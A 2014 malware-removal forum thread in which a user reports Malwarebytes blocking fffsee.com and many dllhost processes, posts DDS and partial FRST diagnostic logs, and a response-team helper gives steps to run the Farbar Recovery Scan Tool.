Getting multiple fffsee.com blocks and multiple dllhost32.dll in task manager


21 replies to this topic

#1 dazedandconfused21

dazedandconfused21

  • Members
  • 11 posts

Posted 31 October 2014 - 07:21 AM

Hello,

I have a PC that has Malwarebytes and AVG 2015. Malwarebytes continues to pop up showing it is blocking fffsee.com several times, and the PC is running very slow. When I check Task Manager, many instances of dllhost*32 are running. I removed Google Chrome and Java, which slowed down the start of the dllhost*32, but I am still killing the processes to work on the PC. I am also noting extra explorer.exe opening in Task Manager and am killing these when I see them as well. Thank you for your assistance.

 

Here is the DDS.txt:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17344
Run by Deborah at 7:23:48 on 2014-10-31
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3551.2024 [GMT -4:00]
.
AV: AVG AntiVirus Free Edition 2015 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition 2015 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
.
============== Running Processes ===============
.
c:\PROGRA~2\AVG\AVG2015\avgrsa.exe
C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe
C:\Program Files (x86)\Intel\AMT\LMS.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.EXE
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_comm_customer.exe
C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_system_customer.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Lenovo\System Update\SUService.exe
C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_user_customer.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
C:\Windows\System32\StikyNot.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
C:\Program Files (x86)\AVG\AVG2015\avgui.exe
C:\Program Files (x86)\AVG Secure Search\vprot.exe
C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
C:\Windows\system32\taskeng.exe
C:\Windows\SysWOW64\ctfmon.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe
C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
C:\Program Files\Lenovo\Lenovo Mouse Suite\Pelmiced.exe
C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
C:\Windows\system32\ctfmon.exe
C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
C:\Windows\system32\notepad.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Windows\explorer.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\cscript.exe
C:\Windows\syswow64\dllhost.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/webhp?rls=ig
uSearch Bar = Preserve
mWinlogon: Userinit = userinit.exe
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: AVG Safe Search: {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: {95B7759C-8C7F-4BF1-B163-73684A933233} - <orphaned>
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
uRun: [RESTART_STICKY_NOTES] C:\Windows\System32\StikyNot.exe
mRun: [Power Manager Power Agenda] C:\PROGRA~2\ThinkPad\UTILIT~1\DPMHost.exe
mRun: [Lenovo Registration] C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot
mRun: [D-Link D-Link DWA-125] C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
mRun: [WZCSLDR2] C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
mRun: [Display] C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe
mRun: [EaseUs Watch] "C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe"
mRun: [EaseUs Tray] "C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe"
mRun: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2015\avgui.exe" /TRAYONLY
mRun: [vProt] "C:\Program Files (x86)\AVG Secure Search\vprot.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
mRun: [IJNetworkScannerSelectorEX] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: dontdisplaylastusername = dword:1
mPolicies-System: DisableCAD = dword:1
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435} : NameServer = 8.8.8.8,8.8.4.4
TCP: Interfaces\{519D74A0-D86D-4949-98FA-74FF6C7DB6FA}\350594E6D24425 : DHCPNameServer = 192.168.168.10
TCP: Interfaces\{519D74A0-D86D-4949-98FA-74FF6C7DB6FA}\7475633345 : DHCPNameServer = 192.168.1.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
IFEO: ehshell.exe - "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
x64-BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll
x64-BHO: AVG Safe Search: {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} -
x64-TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [Daemon for Mouse Suite] C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE 60
x64-Run: [LogMeIn GUI] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -
x64-Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: GoToAssist Express Customer - C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-IFEO: ehshell.exe - "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
.
============= SERVICES / DRIVERS ===============
.
R? clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86
R? clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64
R? D_Link_DWA-125;D_Link_DWA-125 Service
R? D_Link_DWA-125_WPS;D_Link_DWA-125_WPS Service
R? dmvsc;dmvsc
R? IEEtwCollectorService;Internet Explorer ETW Collector Service
R? LMIRfsClientNP;LMIRfsClientNP
R? ose64;Office 64 Source Engine
R? RoxMediaDB10;RoxMediaDB10
R? RTL8192su;Realtek RTL8192SU Wireless LAN 802.11n USB 2.0 Network Adapter
R? StorSvc;Storage Service
R? TsUsbFlt;TsUsbFlt
R? TsUsbGD;Remote Desktop Generic USB Device
R? WatAdminSvc;Windows Activation Technologies Service
R? wlcrasvc;Windows Live Mesh remote connections service
R? WSDScan;WSD Scan Support via UMB
S? anodlwf;ANOD Network Security Filter driver
S? APC Data Service;APC Data Service
S? Avgdiska;AVG Disk Driver
S? AVGIDSAgent;AVGIDSAgent
S? AVGIDSDriver;AVGIDSDriver
S? AVGIDSHA;AVGIDSHA
S? Avgldx64;AVG AVI Loader Driver
S? Avgloga;AVG Logging Driver
S? Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield
S? Avgrkx64;AVG Anti-Rootkit Driver
S? Avgtdia;AVG TDI Driver
S? avgtp;avgtp
S? avgwd;AVG WatchDog
S? e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K
S? EaseUS Agent;EaseUS Agent
S? EUBAKUP;EUBAKUP
S? EUBKMON;EUBKMON
S? EUDSKACS;EUDSKACS
S? EUFDDISK;EUFDDISK
S? GoToAssist Remote Support Customer;GoToAssist Remote Support Customer
S? Guard Agent;Guard Agent
S? HECIx64;Intel® Management Engine Interface
S? LMIGuardianSvc;LMIGuardianSvc
S? LMIInfo;LogMeIn Kernel Information Provider
S? LMIRfsDriver;LogMeIn Remote File System Driver
S? mbamchameleon;mbamchameleon
S? MBAMProtector;MBAMProtector
S? MBAMScheduler;MBAMScheduler
S? MBAMService;MBAMService
S? MBAMSwissArmy;MBAMSwissArmy
S? MBAMWebAccessControl;MBAMWebAccessControl
S? PelService;Session Launcher Service
S? Power Manager DBC Service;Power Manager DBC Service
S? PxHlpa64;PxHlpa64
S? TVTI2C;Lenovo SM bus driver
S? UNS;Intel® Management and Security Application User Notification Service
S? vToolbarUpdater18.1.9;vToolbarUpdater18.1.9
.
=============== Created Last 30 ================
.
2014-10-31 10:50:58 -------- d-----w- C:\FRST
2014-10-31 10:27:26 -------- d-----w- C:\ProgramData\Oracle
2014-10-31 09:15:58 536576 ----a-w- C:\Windows\SysWow64\sqlite3.dll
2014-10-31 09:12:54 -------- d-----w- C:\AdwCleaner
2014-10-24 16:34:00 -------- d--h--w- C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-21 14:54:07 -------- d-----w- C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 14:51:06 -------- d-----w- C:\ProgramData\AVG2015
2014-10-21 14:46:27 -------- d-----w- C:\Users\Deborah\AppData\Local\Avg2015
2014-10-20 17:53:52 0 ----a-w- C:\Windows\System32\qzmktxy.dll
2014-10-15 18:52:58 424448 ----a-w- C:\Windows\System32\aeinv.dll
2014-10-15 18:51:54 77312 ----a-w- C:\Windows\System32\packager.dll
2014-10-15 18:51:54 67072 ----a-w- C:\Windows\SysWow64\packager.dll
.
==================== Find3M  ====================
.
2014-10-31 10:42:24 129752 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-10 02:05:59 276480 ----a-w- C:\Windows\System32\generaltel.dll
2014-10-10 02:05:42 507392 ----a-w- C:\Windows\System32\aepdu.dll
2014-10-01 15:11:26 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-01 15:11:16 93400 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-01 15:11:12 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-09-29 00:58:48 3198976 ----a-w- C:\Windows\System32\win32k.sys
2014-09-25 22:32:04 2017280 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-09-25 22:31:02 2108416 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-09-25 07:33:57 166984 ----a-w- C:\Windows\System32\g2ax_credential_provider64_758.dll
2014-09-25 02:08:38 371712 ----a-w- C:\Windows\System32\qdvd.dll
2014-09-25 01:40:50 519680 ----a-w- C:\Windows\SysWow64\qdvd.dll
2014-09-19 01:56:02 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2014-09-19 01:55:49 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2014-09-19 01:40:43 66048 ----a-w- C:\Windows\System32\iesetup.dll
2014-09-19 01:40:03 547328 ----a-w- C:\Windows\System32\vbscript.dll
2014-09-19 01:39:58 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2014-09-19 01:38:27 83968 ----a-w- C:\Windows\System32\MshtmlDac.dll
2014-09-19 01:36:57 5829632 ----a-w- C:\Windows\System32\jscript9.dll
2014-09-19 01:26:00 139264 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-09-19 01:25:49 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe
2014-09-19 01:25:12 4201472 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-09-19 01:25:09 758272 ----a-w- C:\Windows\System32\jscript9diag.dll
2014-09-19 01:18:02 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-09-19 01:14:57 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-09-19 01:06:47 72704 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-09-19 01:02:07 454656 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-09-19 01:01:47 61952 ----a-w- C:\Windows\SysWow64\iesetup.dll
2014-09-19 01:01:03 51200 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-09-19 00:59:40 61952 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2014-09-19 00:50:16 112128 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-09-19 00:49:31 597504 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2014-09-19 00:40:12 1249280 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2014-09-19 00:36:23 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-09-19 00:33:18 2309632 ----a-w- C:\Windows\System32\wininet.dll
2014-09-19 00:18:55 1068032 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-09-18 23:59:11 1810944 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-09-18 02:00:42 3241472 ----a-w- C:\Windows\System32\msi.dll
2014-09-18 01:32:52 2363904 ----a-w- C:\Windows\SysWow64\msi.dll
2014-09-09 22:11:04 2048 ----a-w- C:\Windows\System32\tzres.dll
2014-09-09 21:47:10 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2014-09-04 05:23:20 424448 ----a-w- C:\Windows\System32\rastls.dll
2014-09-04 05:04:15 372736 ----a-w- C:\Windows\SysWow64\rastls.dll
2014-08-23 02:07:00 404480 ----a-w- C:\Windows\System32\gdi32.dll
2014-08-23 01:45:55 311808 ----a-w- C:\Windows\SysWow64\gdi32.dll
2014-08-21 01:45:10 243480 ----a-w- C:\Windows\System32\drivers\avgldx64.sys
2014-08-19 03:11:28 693176 ----a-w- C:\Windows\System32\winload.efi
2014-08-19 03:10:10 616352 ----a-w- C:\Windows\System32\winresume.efi
2014-08-19 03:08:04 503808 ----a-w- C:\Windows\System32\srcore.dll
2014-08-19 03:08:04 50176 ----a-w- C:\Windows\System32\srclient.dll
2014-08-19 03:08:03 63488 ----a-w- C:\Windows\System32\setbcdlocale.dll
2014-08-19 03:07:51 58880 ----a-w- C:\Windows\System32\appidapi.dll
2014-08-19 03:07:51 32256 ----a-w- C:\Windows\System32\appidsvc.dll
2014-08-19 03:07:33 296960 ----a-w- C:\Windows\System32\rstrui.exe
2014-08-19 03:07:11 17920 ----a-w- C:\Windows\System32\appidcertstorecheck.exe
2014-08-19 03:07:11 146944 ----a-w- C:\Windows\System32\appidpolicyconverter.exe
2014-08-19 02:41:39 43008 ----a-w- C:\Windows\SysWow64\srclient.dll
2014-08-19 02:41:22 50688 ----a-w- C:\Windows\SysWow64\appidapi.dll
2014-08-19 02:06:56 61440 ----a-w- C:\Windows\System32\drivers\appid.sys
2014-08-11 16:49:08 50976 ----a-w- C:\Windows\System32\drivers\avgtpx64.sys
2014-08-07 01:39:52 123672 ----a-w- C:\Windows\System32\drivers\avgmfx64.sys
.
============= FINISH:  7:32:20.95 ===============
 


Edited by xXToffeeXx, 31 October 2014 - 07:32 AM.
Moved to MRL due to DDS log posted~




#2 shelf life

shelf life

  • Malware Response Team
  • 2,651 posts
  • Gender:Male
  • Location:@localhost

Posted 02 November 2014 - 01:17 PM

hi,

 

If you still need help, download a copy of FRST and post its two logs and we will go from there:

 

Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.

 

Looks like you can get the 64-bit version.
 
  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
 
The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.


How Can I Reduce My Risk to Malware?


#3 dazedandconfused21

dazedandconfused21
  • Topic Starter

  • Members
  • 11 posts

Posted 02 November 2014 - 03:29 PM

Good afternoon,

Below are the two logs requested:

 

FRST.log

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Deborah (administrator) on ASSISTANT on 02-11-2014 15:13:06
Running from C:\Users\Deborah\Downloads
Loaded Profiles: Deborah & Brenda & Administrator (Available profiles: Deborah & Brenda & Administrator)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_comm_customer.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_system_customer.exe
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Citrix Online, LLC) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_user_customer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe
(Wireless Service) C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Secure Search\vprot.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Schneider Electric) C:\Program Files (x86)\APC\PowerChute Personal Edition\apcsystray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\PELMICED.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

